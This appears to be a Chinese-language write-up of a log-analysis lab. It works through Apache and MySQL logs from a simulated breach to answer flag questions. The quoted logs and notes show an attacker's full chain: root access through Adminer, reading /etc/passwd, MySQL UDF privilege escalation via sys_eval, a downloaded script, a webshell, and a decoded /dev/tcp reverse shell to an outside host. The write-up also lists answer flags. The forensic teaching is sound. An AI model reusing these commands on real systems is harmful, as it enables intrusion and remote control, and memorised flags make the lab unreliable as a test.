192.168.200.2 - - [01/Aug/2023:02:07:52 +0000] "GET /adminer.php?username=root&db=mysql&script=db HTTP/1.1" 200 7170 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:54 +0000] "GET /adminer.php?username=root&db=mysql&sql= HTTP/1.1" 200 3570 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:08:05 +0000] "GET /adminer.php?username=root&db=cms&sql= HTTP/1.1" 200 3082 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:08:17 +0000] "POST /sh.php HTTP/1.1" 200 332 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
192.168.200.2 - - [01/Aug/2023:02:08:20 +0000] "POST /sh.php HTTP/1.1" 200 245 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:09:04 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20version()%3B%0A HTTP/1.1" 200 3835 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:09:47 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20load_file(%22%2Fetc%2Fpasswd%22)%3B HTTP/1.1" 200 4287 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20version()%3B%0A" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:07 +0000] "POST /adminer.php?username=root&db=cms&sql=show%20variables%20like%20%27%25plugin%25%27%3B HTTP/1.1" 200 3746 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20load_file(%22%2Fetc%2Fpasswd%22)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:20 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3478 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=show%20variables%20like%20%27%25plugin%25%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:28 +0000] "GET /adminer.php?username=root&db=cms&sql= HTTP/1.1" 200 3363 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:30 +0000] "GET /adminer.php?username=root HTTP/1.1" 200 3377 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:31 +0000] "GET /adminer.php?username=root&sql= HTTP/1.1" 200 2866 "http://192.168.200.31:8005/adminer.php?username=root" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:33 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3147 "http://192.168.200.31:8005/adminer.php?username=root&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:00 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 7687 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:34 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 7666 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:54 +0000] "POST /adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B HTTP/1.1" 200 3324 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:00 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3740 "http://192.168.200.31:8005/adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:08 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3298 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3761 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:53 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27curl%20192.168.100.13%3A771%27)%3B HTTP/1.1" 200 3800 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:14:11 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20192.168.100.13%3A771%27)%3B HTTP/1.1" 200 3822 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27curl%20192.168.100.13%3A771%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:31 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B HTTP/1.1" 200 3862 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20192.168.100.13%3A771%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:35 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A777%2F1.sh%27)%3B HTTP/1.1" 200 3875 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:43 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 3975 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A777%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:57 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 3889 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:17:05 +0000] "POST /sh.php HTTP/1.1" 200 416 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:17:09 +0000] "POST /sh.php HTTP/1.1" 200 470 "-" "Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01"
192.168.200.2 - - [01/Aug/2023:02:17:10 +0000] "POST /sh.php HTTP/1.1" 200 209 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"
192.168.200.2 - - [01/Aug/2023:02:17:37 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 4116 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B HTTP/1.1" 200 4025 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:27 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4023 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:37 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4029 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:19:07 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4014 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
|
发现主要是对/tmp/1.sh进行执行,我们直接查看,对上面那个base64解码也行
1
2
|
root@xuanji:/var/log/apache2# cat /tmp/1.sh
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
|
所以flag
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
前下看log目录下面还有mysql目录
1
|
cat /var/log/mysql/error.log
|
发现其实对系统执行命令了,而且看到前面用sys_eval来执行可以想到是mysql的udf提权
我们回到web目录查看mysql有关文件
1
2
3
4
5
6
|
root@xuanji:/var/www/html# cat common.php
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "数据库连接失败";
}
|
找到账密,连上数据库
1
2
|
root@xuanji:/var/www/html# mysql -u root -p
Enter password:
|
1
2
3
4
5
6
7
8
9
10
|
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
|
然后切换到mysql数据库
然后查看函数
1
2
3
4
5
6
7
|
MariaDB [mysql]> select * from func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.01 sec)
|
提权文件就是这个so
然后全局find
1
|
find / -name "mysqludf.so" 2>/dev/null
|
1
2
|
root@xuanji:/var/www/html# find / -name "mysqludf.so" 2>/dev/null
/usr/lib/mysql/plugin/mysqludf.so
|
格式补兑,我们进目录看看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
root@xuanji:/usr/lib/mysql/plugin# ls -al
total 4752
drwxr-xr-x. 1 mysql mysql 39 Aug 1 2023 .
drwxr-xr-x. 1 root root 20 Jul 31 2023 ..
-rw-r--r--. 1 mysql mysql 10416 May 16 2019 auth_pam.so
-rw-r--r--. 1 mysql mysql 6464 May 16 2019 auth_socket.so
-rw-r--r--. 1 mysql mysql 10200 May 16 2019 dialog.so
-rw-r--r--. 1 mysql mysql 1600136 May 16 2019 ha_innodb.so
-rw-r--r--. 1 mysql mysql 159304 May 16 2019 handlersocket.so
-rw-r--r--. 1 mysql mysql 6104 May 16 2019 mysql_clear_password.so
-rw-rw-rw-. 1 mysql mysql 10754 Aug 1 2023 mysqludf.so
-rw-r--r--. 1 mysql mysql 39944 May 16 2019 semisync_master.so
-rw-r--r--. 1 mysql mysql 14736 May 16 2019 semisync_slave.so
-rw-r--r--. 1 mysql mysql 55696 May 16 2019 server_audit.so
-rw-r--r--. 1 mysql mysql 2918008 May 16 2019 sphinx.so
-rw-r--r--. 1 mysql mysql 11008 May 16 2019 sql_errlog.so
-rw-rw-rw-. 1 mysql mysql 34 Aug 1 2023 udf.so
|
所以最后路径就是
1
|
/usr/lib/mysql/plugin/udf.so
|
md5一下
1
|
flag{b1818bde4e310f3d23f1005185b973e7}
|
4.黑客获取的权限 flag{whoami后的值}
直接sys_eval执行一下
1
2
3
4
5
6
7
8
9
|
MariaDB [mysql]> select sys_eval("whoami")
-> ;
+--------------------+
| sys_eval("whoami") |
+--------------------+
| mysql
|
+--------------------+
1 row in set (0.01 sec)
|
第二章日志分析-apache日志分析
1、提交当天访问次数最多的IP,即黑客IP:
1
|
cat /var/log/apache2/access.log |grep "03/Aug/2023:08:" | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10
|
1
2
3
4
5
|
6555 192.168.200.2
29 ::1
5 192.168.200.38
1 192.168.200.48
1 192.168.200.211
|
所以flag
2、黑客使用的浏览器指纹是什么,提交指纹的md5:
1
|
cat /var/log/apache2/access.log | grep "192.168.200.2" | awk -F'"' '{print $6}' | uniq -c
|
1
2
3
|
12 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
1 curl/7.74.0
6543 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
|
所以flag
1
|
flag{2D6330F380F44AC20F3A02EED0958F66}
|
3、查看包含index.php页面被访问的次数,提交次数:
1
|
cat /var/log/apache2/access.log | grep "/index.php" | wc -l
|
4、查看黑客IP访问了多少次,提交次数:
上面已经知道次数了,更精确可以加上grep
5、查看2023年8月03日8时这一个小时内有多少IP访问,提交次数:
又上面可知5条,或者加上wc -l命令
